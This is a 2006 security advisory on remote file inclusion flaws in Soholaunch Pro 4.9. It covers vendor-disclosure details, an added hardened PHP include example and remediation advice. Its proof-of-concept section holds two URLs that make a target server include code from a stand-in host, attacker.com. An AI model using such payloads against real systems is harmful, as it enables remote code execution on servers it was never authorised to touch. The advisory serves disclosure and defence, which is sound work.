Soholaunch Pro 4.9 r36 Remote File Inclusion Vulnerabilities

____________________     ___ ___ ________
\_   _____/\_    ___ \ /    |    \\_____ \
 |    __)_ /     \ \//      ~     \/   |   \
 |         \\     \___\     Y     /    |     \
/_______ / \______ /\___|_ /\_______ /
        \/          \/        \/          \/                           .OR.ID
ECHO_ADV_57$2006

--------------------------------------------------------------------------------------------
[ECHO_ADV_57$2006]Soholaunch Pro <=4.9 r36 Multiple Remote File Inclusion Vulnerability
--------------------------------------------------------------------------------------------

Author          : Dedi Dwianto a.k.a the_day
Date Found      : October, 31st 2006
Location        : Indonesia, Jakarta
web             : http://advisories.echo.or.id/adv/adv57-theday-2006.txt
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application      : Soholaunch Pro Edition
version          : <=4.9 r46
URL              : http://www.soholaunch.com

Soholaunch Pro Edition is a software product that makes it easy for people of all experience levels to create
and maintain a great website. It reins in the hard parts of building a website and presents them in a way that the
non-geek can understand and control.
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

I found a vulnerability in the script shared_functions.php
--------------------------shared_functions.php-----------------------------------
....
<?
...
include_once($_SESSION['docroot_path']."/sohoadmin/includes/mysql_insert.class.php");

# userData manipulation class (works with misc_userdata table)

include_once($_SESSION['docroot_path']."/sohoadmin/includes/userdata.class.php");

...
----------------------------------------------------------

Input passed to the "$_SESSION['docroot_path']" parameter in shared_functions.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Also affected files :

/client_files/shopping_cart/pgm-shopping_css.inc.php
/program/includes/shared_functions.php


Proof Of Concept:
~~~~~~~~~~~~~~~

http://target.com/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://attacker.com/inject.txt?
http://target.com/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://attacker.com/inject.txt?


Solution:
~~~~~~~

- Sanitize the $_SESSION['docroot_path'] variable in the affected files.
- Turn off register_globals
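
The following is an added example, not code from Soholaunch or from this advisory. It places the include pattern described above (where, with register_globals enabled, a `_SESSION[docroot_path]` query-string key populates `$_SESSION['docroot_path']` before the script reads it) beside a hardened form that derives the application root from the script's own location on disk and validates any session-supplied path against an allow-list of real directories. The function names, the directory depth in applicationRoot(), and the sample inputs in the demonstration are assumptions made for illustration; it needs PHP 7.1 or later.

```php
<?php
declare(strict_types=1);

/*
 * Added example, not code from Soholaunch or from the advisory author.
 * It shows the include pattern the advisory describes beside a hardened
 * version. Function names, the allow-list and the sample inputs below
 * are constructed for illustration.
 */

/* Vulnerable pattern (as in the advisory). With register_globals=On and no
 * session_start() before this line, a query string such as
 *   ?_SESSION[docroot_path]=http://example.invalid/x.txt?
 * sets $_SESSION['docroot_path'] directly from the request, so the file
 * that gets included is chosen by the client. */
function vulnerableInclude(): void
{
    include_once($_SESSION['docroot_path'] . "/sohoadmin/includes/userdata.class.php");
}

/* Hardened form, part 1: do not take the base path from request data at all.
 * The application root is a property of where this file lives on disk, so
 * derive it from __DIR__ (dirname(__FILE__) on PHP < 5.3). The depth of 3
 * assumes this file is <docroot>/sohoadmin/program/includes/<file>.php, as in
 * the advisory's paths. */
function applicationRoot(): string
{
    return dirname(__DIR__, 3);
}

/* Hardened form, part 2: if a base path really must come from the session,
 * make sure $_SESSION is the server-side store (session_start() before any
 * read) and still validate the value: resolve it with realpath() and accept
 * only an exact match against an allow-list of real directories. Returns
 * the canonical directory, or null if the value is not acceptable. */
function validatedDocroot($candidate, array $allowedRoots): ?string
{
    if (!is_string($candidate) || $candidate === '') {
        return null;
    }
    // Reject anything that looks like a stream wrapper (http://, ftp://,
    // php://, data:, ...) before touching the filesystem. Two or more
    // characters before the colon, so a Windows drive letter still passes.
    if (preg_match('#^[a-z][a-z0-9+.\-]+:#i', $candidate)) {
        return null;
    }
    $real = realpath($candidate);
    if ($real === false) {
        return null; // does not exist on disk
    }
    foreach ($allowedRoots as $root) {
        $allowed = realpath($root);
        if ($allowed !== false && $real === $allowed) {
            return $real;
        }
    }
    return null;
}

function hardenedInclude(): void
{
    session_start(); // $_SESSION now comes from the server-side session store
    $docroot = validatedDocroot($_SESSION['docroot_path'] ?? null, [applicationRoot()]);
    if ($docroot === null) {
        // Fall back to the on-disk location rather than trusting the session.
        $docroot = applicationRoot();
    }
    include_once $docroot . '/sohoadmin/includes/userdata.class.php';
}

/* Stand-alone demonstration of the validator with constructed inputs. */
if (PHP_SAPI === 'cli') {
    $allowed = [sys_get_temp_dir()];
    $cases = [
        'http://example.invalid/inject.txt?' => null,                          // remote URL: rejected
        'php://input'                        => null,                          // stream wrapper: rejected
        '/nonexistent/path'                  => null,                          // not on disk: rejected
        sys_get_temp_dir()                   => realpath(sys_get_temp_dir()),  // allow-listed: accepted
    ];
    foreach ($cases as $input => $expected) {
        $got = validatedDocroot($input, $allowed);
        printf("%-40s => %s\n", $input, $got === $expected ? 'as expected' : 'UNEXPECTED');
    }
}
```

Run it with `php` on the command line to see the validator's verdict on each constructed input. Two configuration settings complement the code rather than replace it: register_globals (removed in PHP 5.4) is what lets a query-string `_SESSION[...]` key populate the session array in the first place, and allow_url_include=Off (available from PHP 5.2; on older releases allow_url_fopen=Off) stops include_once from fetching remote resources even when a bad path slips through. Since the advisory notes that local resources can be included as well, the on-disk root derivation and the allow-list check remain necessary even with both settings in place.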

Timeline :
~~~~~~~~~

31-10-2006 bugs found
31-10-2006 vendor contacted
07-11-2006 public disclosure

---------------------------------------------------------------------------

Shoutz:
~~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S'to,lirva32,anonymous
~ Jessy My Brain
~ az001,bomm_3x,matdhule,angelia
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~~
     EcHo Research & Development Center
     the_day[at]echo[dot]or[dot]id

-------------------------------- [ EOF ]----------------------------------

# milw0rm.com [2006-11-06]